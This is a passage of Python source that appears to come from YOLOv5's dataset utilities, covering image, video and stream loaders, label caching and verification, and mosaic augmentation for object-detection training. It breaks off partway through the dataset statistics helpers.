dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augmentation
hyp=hyp, # hyperparameters
rect=rect, # rectangular batches
cache_images=cache,
single_cls=single_cls,
stride=int(stride),
pad=pad,
image_weights=image_weights,
prefix=prefix)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count() // WORLD_SIZE, batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = None if rank == -1 else distributed.DistributedSampler(dataset, shuffle=shuffle)
loader = DataLoader if image_weights else InfiniteDataLoader # only DataLoader allows for attribute updates
return loader(dataset,
batch_size=batch_size,
shuffle=shuffle and sampler is None,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn), dataset
class InfiniteDataLoader(dataloader.DataLoader):
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler:
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
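# Minimal sketch (added for illustration, not part of the original file): InfiniteDataLoader wraps
# its batch_sampler in _RepeatSampler and builds a single persistent iterator, so worker processes
# are created once and reused across epochs instead of being torn down after every pass over the
# data. The dataset, worker count and training loop below are hypothetical placeholders.
def _demo_infinite_dataloader(dataset, epochs=3, batch_size=16):
    loader = InfiniteDataLoader(dataset, batch_size=batch_size, num_workers=2)
    for _ in range(epochs):
        for batch in loader:   # each pass draws len(loader) batches from the same iterator
            pass               # a training step would go here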
class LoadImages:
# YOLOv5 image/video dataloader, i.e. `python detect.py --source image.jpg/vid.mp4`
def __init__(self, path, img_size=640, stride=32, auto=True):
p = str(Path(path).resolve()) # os-agnostic absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception(f'ERROR: {p} does not exist')
images = [x for x in files if x.split('.')[-1].lower() in IMG_FORMATS]
videos = [x for x in files if x.split('.')[-1].lower() in VID_FORMATS]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.stride = stride
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'image'
self.auto = auto
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, f'No images or videos found in {p}. ' \
f'Supported formats are:\nimages: {IMG_FORMATS}\nvideos: {VID_FORMATS}'
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
s = f'video {self.count + 1}/{self.nf} ({self.frame}/{self.frames}) {path}: '
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, f'Image Not Found {path}'
s = f'image {self.count}/{self.nf} {path}: '
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride, auto=self.auto)[0]
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return path, img, img0, self.cap, s
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.frames = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
# YOLOv5 local webcam dataloader, i.e. `python detect.py --source 0`
def __init__(self, pipe='0', img_size=640, stride=32):
self.img_size = img_size
self.stride = stride
self.pipe = eval(pipe) if pipe.isnumeric() else pipe
self.cap = cv2.VideoCapture(self.pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
# Print
assert ret_val, f'Camera Error {self.pipe}'
img_path = 'webcam.jpg'
s = f'webcam {self.count}: '
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return img_path, img, img0, None, s
def __len__(self):
return 0
class LoadStreams:
# YOLOv5 streamloader, i.e. `python detect.py --source 'rtsp://example.com/media.mp4' # RTSP, RTMP, HTTP streams`
def __init__(self, sources='streams.txt', img_size=640, stride=32, auto=True):
self.mode = 'stream'
self.img_size = img_size
self.stride = stride
if os.path.isfile(sources):
with open(sources) as f:
sources = [x.strip() for x in f.read().strip().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs, self.fps, self.frames, self.threads = [None] * n, [0] * n, [0] * n, [None] * n
self.sources = [clean_str(x) for x in sources] # clean source names for later
self.auto = auto
for i, s in enumerate(sources): # index, source
# Start thread to read frames from video stream
st = f'{i + 1}/{n}: {s}... '
if 'youtube.com/' in s or 'youtu.be/' in s: # if source is YouTube video
check_requirements(('pafy', 'youtube_dl'))
import pafy
s = pafy.new(s).getbest(preftype="mp4").url # YouTube URL
s = eval(s) if s.isnumeric() else s # i.e. s = '0' local webcam
cap = cv2.VideoCapture(s)
assert cap.isOpened(), f'{st}Failed to open {s}'
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
self.fps[i] = max(cap.get(cv2.CAP_PROP_FPS) % 100, 0) or 30.0 # 30 FPS fallback
self.frames[i] = max(int(cap.get(cv2.CAP_PROP_FRAME_COUNT)), 0) or float('inf') # infinite stream fallback
_, self.imgs[i] = cap.read() # guarantee first frame
self.threads[i] = Thread(target=self.update, args=([i, cap, s]), daemon=True)
LOGGER.info(f"{st} Success ({self.frames[i]} frames {w}x{h} at {self.fps[i]:.2f} FPS)")
self.threads[i].start()
LOGGER.info('') # newline
# check for common shapes
s = np.stack([letterbox(x, self.img_size, stride=self.stride, auto=self.auto)[0].shape for x in self.imgs])
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
LOGGER.warning('WARNING: Stream shapes differ. For optimal performance supply similarly-shaped streams.')
def update(self, i, cap, stream):
# Read stream `i` frames in daemon thread
n, f, read = 0, self.frames[i], 1 # frame number, frame array, inference every 'read' frame
while cap.isOpened() and n < f:
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n % read == 0:
success, im = cap.retrieve()
if success:
self.imgs[i] = im
else:
LOGGER.warning('WARNING: Video stream unresponsive, please check your IP camera connection.')
self.imgs[i] *= 0
cap.open(stream) # re-open stream if signal was lost
time.sleep(1 / self.fps[i]) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if not all(x.is_alive() for x in self.threads) or cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img0 = self.imgs.copy()
img = [letterbox(x, self.img_size, stride=self.stride, auto=self.rect and self.auto)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[..., ::-1].transpose((0, 3, 1, 2)) # BGR to RGB, BHWC to BCHW
img = np.ascontiguousarray(img)
return self.sources, img, img0, None, ''
def __len__(self):
return len(self.sources) # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
# Define label paths as a function of image paths
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
return [sb.join(x.rsplit(sa, 1)).rsplit('.', 1)[0] + '.txt' for x in img_paths]
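# Worked example (illustrative only, never called): img2label_paths simply swaps the last
# '/images/' path component for '/labels/' and the image extension for '.txt', which is the
# default YOLOv5 dataset layout. The coco128 path below is a hypothetical example.
def _demo_img2label_paths():
    img = os.path.join('..', 'datasets', 'coco128', 'images', 'train2017', '000000000009.jpg')
    lbl = os.path.join('..', 'datasets', 'coco128', 'labels', 'train2017', '000000000009.txt')
    assert img2label_paths([img]) == [lbl]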
class LoadImagesAndLabels(Dataset):
# YOLOv5 train_loader/val_loader, loads images and labels for training and validation
cache_version = 0.6 # dataset labels *.cache version
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, prefix=''):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
self.path = path
self.albumentations = Albumentations() if augment else None
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p) # os-agnostic
if p.is_dir(): # dir
f += glob.glob(str(p / '**' / '*.*'), recursive=True)
# f = list(p.rglob('*.*')) # pathlib
elif p.is_file(): # file
with open(p) as t:
t = t.read().strip().splitlines()
parent = str(p.parent) + os.sep
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
# f += [p.parent / x.lstrip(os.sep) for x in t] # local to global path (pathlib)
else:
raise Exception(f'{prefix}{p} does not exist')
self.img_files = sorted(x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in IMG_FORMATS)
# self.img_files = sorted([x for x in f if x.suffix[1:].lower() in IMG_FORMATS]) # pathlib
assert self.img_files, f'{prefix}No images found'
except Exception as e:
raise Exception(f'{prefix}Error loading data from {path}: {e}\nSee {HELP_URL}')
# Check cache
self.label_files = img2label_paths(self.img_files) # labels
cache_path = (p if p.is_file() else Path(self.label_files[0]).parent).with_suffix('.cache')
try:
cache, exists = np.load(cache_path, allow_pickle=True).item(), True # load dict
assert cache['version'] == self.cache_version # same version
assert cache['hash'] == get_hash(self.label_files + self.img_files) # same hash
        except Exception:  # cache missing, unreadable or stale (version/hash mismatch); re-cache
cache, exists = self.cache_labels(cache_path, prefix), False # cache
# Display cache
nf, nm, ne, nc, n = cache.pop('results') # found, missing, empty, corrupted, total
if exists:
d = f"Scanning '{cache_path}' images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupted"
tqdm(None, desc=prefix + d, total=n, initial=n) # display cache results
if cache['msgs']:
LOGGER.info('\n'.join(cache['msgs'])) # display warnings
assert nf > 0 or not augment, f'{prefix}No labels in {cache_path}. Can not train without labels. See {HELP_URL}'
# Read cache
[cache.pop(k) for k in ('hash', 'version', 'msgs')] # remove items
labels, shapes, self.segments = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.img_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
n = len(shapes) # number of images
        bi = np.floor(np.arange(n) / batch_size).astype(int)  # batch index
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
self.indices = range(n)
# Update labels
include_class = [] # filter labels to include only these classes (optional)
include_class_array = np.array(include_class).reshape(1, -1)
for i, (label, segment) in enumerate(zip(self.labels, self.segments)):
if include_class:
j = (label[:, 0:1] == include_class_array).any(1)
self.labels[i] = label[j]
if segment:
self.segments[i] = segment[j]
if single_cls: # single-class training, merge all classes into 0
self.labels[i][:, 0] = 0
if segment:
self.segments[i][:, 0] = 0
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
            self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(int) * stride
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs, self.img_npy = [None] * n, [None] * n
if cache_images:
if cache_images == 'disk':
self.im_cache_dir = Path(Path(self.img_files[0]).parent.as_posix() + '_npy')
self.img_npy = [self.im_cache_dir / Path(f).with_suffix('.npy').name for f in self.img_files]
self.im_cache_dir.mkdir(parents=True, exist_ok=True)
gb = 0 # Gigabytes of cached images
self.img_hw0, self.img_hw = [None] * n, [None] * n
results = ThreadPool(NUM_THREADS).imap(lambda x: load_image(*x), zip(repeat(self), range(n)))
pbar = tqdm(enumerate(results), total=n)
for i, x in pbar:
if cache_images == 'disk':
if not self.img_npy[i].exists():
np.save(self.img_npy[i].as_posix(), x[0])
gb += self.img_npy[i].stat().st_size
else:
self.imgs[i], self.img_hw0[i], self.img_hw[i] = x # im, hw_orig, hw_resized = load_image(self, i)
gb += self.imgs[i].nbytes
pbar.desc = f'{prefix}Caching images ({gb / 1E9:.1f}GB {cache_images})'
pbar.close()
def cache_labels(self, path=Path('./labels.cache'), prefix=''):
# Cache dataset labels, check images and read shapes
x = {} # dict
nm, nf, ne, nc, msgs = 0, 0, 0, 0, [] # number missing, found, empty, corrupt, messages
desc = f"{prefix}Scanning '{path.parent / path.stem}' images and labels..."
with Pool(NUM_THREADS) as pool:
pbar = tqdm(pool.imap(verify_image_label, zip(self.img_files, self.label_files, repeat(prefix))),
desc=desc, total=len(self.img_files))
for im_file, l, shape, segments, nm_f, nf_f, ne_f, nc_f, msg in pbar:
nm += nm_f
nf += nf_f
ne += ne_f
nc += nc_f
if im_file:
x[im_file] = [l, shape, segments]
if msg:
msgs.append(msg)
pbar.desc = f"{desc}{nf} found, {nm} missing, {ne} empty, {nc} corrupted"
pbar.close()
if msgs:
LOGGER.info('\n'.join(msgs))
if nf == 0:
LOGGER.warning(f'{prefix}WARNING: No labels found in {path}. See {HELP_URL}')
x['hash'] = get_hash(self.label_files + self.img_files)
x['results'] = nf, nm, ne, nc, len(self.img_files)
x['msgs'] = msgs # warnings
x['version'] = self.cache_version # cache version
try:
np.save(path, x) # save cache for next time
path.with_suffix('.cache.npy').rename(path) # remove .npy suffix
LOGGER.info(f'{prefix}New cache created: {path}')
except Exception as e:
LOGGER.warning(f'{prefix}WARNING: Cache directory {path.parent} is not writeable: {e}') # not writeable
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
index = self.indices[index] # linear, shuffled, or image_weights
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp augmentation
if random.random() < hyp['mixup']:
img, labels = mixup(img, labels, *load_mosaic(self, random.randint(0, self.n - 1)))
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
labels = self.labels[index].copy()
if labels.size: # normalized xywh to pixel xyxy format
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])
if self.augment:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
nl = len(labels) # number of labels
if nl:
labels[:, 1:5] = xyxy2xywhn(labels[:, 1:5], w=img.shape[1], h=img.shape[0], clip=True, eps=1E-3)
if self.augment:
# Albumentations
img, labels = self.albumentations(img, labels)
nl = len(labels) # update after albumentations
# HSV color-space
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nl:
labels[:, 2] = 1 - labels[:, 2]
# Flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nl:
labels[:, 1] = 1 - labels[:, 1]
# Cutouts
# labels = cutout(img, labels, p=0.5)
labels_out = torch.zeros((nl, 6))
if nl:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
@staticmethod
def collate_fn4(batch):
img, label, path, shapes = zip(*batch) # transposed
n = len(shapes) // 4
img4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]
ho = torch.tensor([[0.0, 0, 0, 1, 0, 0]])
wo = torch.tensor([[0.0, 0, 1, 0, 0, 0]])
s = torch.tensor([[1, 1, 0.5, 0.5, 0.5, 0.5]]) # scale
for i in range(n): # zidane torch.zeros(16,3,720,1280) # BCHW
i *= 4
if random.random() < 0.5:
im = F.interpolate(img[i].unsqueeze(0).float(), scale_factor=2.0, mode='bilinear', align_corners=False)[
0].type(img[i].type())
l = label[i]
else:
im = torch.cat((torch.cat((img[i], img[i + 1]), 1), torch.cat((img[i + 2], img[i + 3]), 1)), 2)
l = torch.cat((label[i], label[i + 1] + ho, label[i + 2] + wo, label[i + 3] + ho + wo), 0) * s
img4.append(im)
label4.append(l)
for i, l in enumerate(label4):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img4, 0), torch.cat(label4, 0), path4, shapes4
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, i):
# loads 1 image from dataset index 'i', returns im, original hw, resized hw
im = self.imgs[i]
if im is None: # not cached in ram
npy = self.img_npy[i]
if npy and npy.exists(): # load npy
im = np.load(npy)
else: # read image
path = self.img_files[i]
im = cv2.imread(path) # BGR
assert im is not None, f'Image Not Found {path}'
h0, w0 = im.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # ratio
if r != 1: # if sizes are not equal
im = cv2.resize(im, (int(w0 * r), int(h0 * r)),
interpolation=cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR)
return im, (h0, w0), im.shape[:2] # im, hw_original, hw_resized
else:
return self.imgs[i], self.img_hw0[i], self.img_hw[i] # im, hw_original, hw_resized
def load_mosaic(self, index):
# YOLOv5 4-mosaic loader. Loads 1 image + 3 random images into a 4-image mosaic
labels4, segments4 = [], []
s = self.img_size
yc, xc = (int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border) # mosaic center x, y
indices = [index] + random.choices(self.indices, k=3) # 3 additional image indices
random.shuffle(indices)
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padw, padh) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padw, padh) for x in segments]
labels4.append(labels)
segments4.extend(segments)
# Concat/clip labels
labels4 = np.concatenate(labels4, 0)
for x in (labels4[:, 1:], *segments4):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4, segments4 = copy_paste(img4, labels4, segments4, p=self.hyp['copy_paste'])
img4, labels4 = random_perspective(img4, labels4, segments4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def load_mosaic9(self, index):
# YOLOv5 9-mosaic loader. Loads 1 image + 8 random images into a 9-image mosaic
labels9, segments9 = [], []
s = self.img_size
indices = [index] + random.choices(self.indices, k=8) # 8 additional image indices
random.shuffle(indices)
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img9
if i == 0: # center
            img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8)  # base image with 9 tiles
h0, w0 = h, w
c = s, s, s + w, s + h # xmin, ymin, xmax, ymax (base) coordinates
elif i == 1: # top
c = s, s - h, s + w, s
elif i == 2: # top right
c = s + wp, s - h, s + wp + w, s
elif i == 3: # right
c = s + w0, s, s + w0 + w, s + h
elif i == 4: # bottom right
c = s + w0, s + hp, s + w0 + w, s + hp + h
elif i == 5: # bottom
c = s + w0 - w, s + h0, s + w0, s + h0 + h
elif i == 6: # bottom left
c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
elif i == 7: # left
c = s - w, s + h0 - h, s, s + h0
elif i == 8: # top left
c = s - w, s + h0 - hp - h, s, s + h0 - hp
padx, pady = c[:2]
x1, y1, x2, y2 = (max(x, 0) for x in c) # allocate coords
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padx, pady) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padx, pady) for x in segments]
labels9.append(labels)
segments9.extend(segments)
# Image
img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:] # img9[ymin:ymax, xmin:xmax]
hp, wp = h, w # height, width previous
# Offset
yc, xc = (int(random.uniform(0, s)) for _ in self.mosaic_border) # mosaic center x, y
img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]
# Concat/clip labels
labels9 = np.concatenate(labels9, 0)
labels9[:, [1, 3]] -= xc
labels9[:, [2, 4]] -= yc
c = np.array([xc, yc]) # centers
segments9 = [x - c for x in segments9]
for x in (labels9[:, 1:], *segments9):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img9, labels9 = replicate(img9, labels9) # replicate
# Augment
img9, labels9 = random_perspective(img9, labels9, segments9,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img9, labels9
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path='../datasets/coco128'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(path + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(path='../datasets/coco128'): # from utils.datasets import *; extract_boxes()
# Convert detection dataset into classification dataset, with one directory per class
path = Path(path) # images dir
shutil.rmtree(path / 'classifier') if (path / 'classifier').is_dir() else None # remove existing
files = list(path.rglob('*.*'))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
if im_file.suffix[1:] in IMG_FORMATS:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0])
if Path(lb_file).exists():
with open(lb_file) as f:
lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg' # new filename
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
                    b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path='../datasets/coco128/images', weights=(0.9, 0.1, 0.0), annotated_only=False):
""" Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
Usage: from utils.datasets import *; autosplit()
Arguments
path: Path to images directory
weights: Train, val, test weights (list, tuple)
annotated_only: Only use images with an annotated txt file
"""
path = Path(path) # images dir
files = sorted(x for x in path.rglob('*.*') if x.suffix[1:].lower() in IMG_FORMATS) # image files only
n = len(files) # number of files
random.seed(0) # for reproducibility
indices = random.choices([0, 1, 2], weights=weights, k=n) # assign each image to a split
txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt'] # 3 txt files
[(path.parent / x).unlink(missing_ok=True) for x in txt] # remove existing
print(f'Autosplitting images from {path}' + ', using *.txt labeled images only' * annotated_only)
for i, img in tqdm(zip(indices, files), total=n):
if not annotated_only or Path(img2label_paths([str(img)])[0]).exists(): # check label
with open(path.parent / txt[i], 'a') as f:
f.write('./' + img.relative_to(path.parent).as_posix() + '\n') # add image to txt file
def verify_image_label(args):
# Verify one image-label pair
im_file, lb_file, prefix = args
nm, nf, ne, nc, msg, segments = 0, 0, 0, 0, '', [] # number (missing, found, empty, corrupt), message, segments
try:
# verify images
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
assert (shape[0] > 9) & (shape[1] > 9), f'image size {shape} <10 pixels'
assert im.format.lower() in IMG_FORMATS, f'invalid image format {im.format}'
if im.format.lower() in ('jpg', 'jpeg'):
with open(im_file, 'rb') as f:
f.seek(-2, 2)
if f.read() != b'\xff\xd9': # corrupt JPEG
ImageOps.exif_transpose(Image.open(im_file)).save(im_file, 'JPEG', subsampling=0, quality=100)
msg = f'{prefix}WARNING: {im_file}: corrupt JPEG restored and saved'
# verify labels
if os.path.isfile(lb_file):
nf = 1 # label found
with open(lb_file) as f:
l = [x.split() for x in f.read().strip().splitlines() if len(x)]
if any([len(x) > 8 for x in l]): # is segment
classes = np.array([x[0] for x in l], dtype=np.float32)
segments = [np.array(x[1:], dtype=np.float32).reshape(-1, 2) for x in l] # (cls, xy1...)
l = np.concatenate((classes.reshape(-1, 1), segments2boxes(segments)), 1) # (cls, xywh)
l = np.array(l, dtype=np.float32)
nl = len(l)
if nl:
assert l.shape[1] == 5, f'labels require 5 columns, {l.shape[1]} columns detected'
assert (l >= 0).all(), f'negative label values {l[l < 0]}'
assert (l[:, 1:] <= 1).all(), f'non-normalized or out of bounds coordinates {l[:, 1:][l[:, 1:] > 1]}'
_, i = np.unique(l, axis=0, return_index=True)
if len(i) < nl: # duplicate row check
l = l[i] # remove duplicates
if segments:
                        segments = [segments[x] for x in i]  # keep only segments for the remaining labels
msg = f'{prefix}WARNING: {im_file}: {nl - len(i)} duplicate labels removed'
else:
ne = 1 # label empty
l = np.zeros((0, 5), dtype=np.float32)
else:
nm = 1 # label missing
l = np.zeros((0, 5), dtype=np.float32)
return im_file, l, shape, segments, nm, nf, ne, nc, msg
except Exception as e:
nc = 1
msg = f'{prefix}WARNING: {im_file}: ignoring corrupt image/label: {e}'
return [None, None, None, None, nm, nf, ne, nc, msg]
def dataset_stats(path='coco128.yaml', autodownload=False, verbose=False, profile=False, hub=False):
""" Return dataset statistics dictionary with images and instances counts per split per class
To run in parent directory: export PYTHONPATH="$PWD/yolov5"
Usage1: from utils.datasets import *; dataset_stats('coco128.yaml', autodownload=True)
Usage2: from utils.datasets import *; dataset_stats('../datasets/coco128_with_yaml.zip')
Arguments
path: Path to data.yaml or data.zip (with data.yaml inside data.zip)
autodownload: Attempt to download dataset if not found locally
        verbose: Print stats dictionary
        profile: Profile the speed of writing/reading the generated stats files
        hub: Also save resized images and a stats.json copy for web/app viewing
    """
def round_labels(labels):
# Update labels to integer class and 6 decimal place floats
return [[int(c), *(round(x, 4) for x in points)] for c, *points in labels]
def unzip(path):
# Unzip data.zip TODO: CONSTRAINT: path/to/abc.zip MUST unzip to 'path/to/abc/'
if str(path).endswith('.zip'): # path is data.zip
assert Path(path).is_file(), f'Error unzipping {path}, file not found'
ZipFile(path).extractall(path=path.parent) # unzip
dir = path.with_suffix('') # dataset directory == zip name
return True, str(dir), next(dir.rglob('*.yaml')) # zipped, data_dir, yaml_path
else: # path is data.yaml
return False, None, path
def hub_ops(f, max_dim=1920):
# HUB ops for 1 image 'f': resize and save at reduced quality in /dataset-hub for web/app viewing
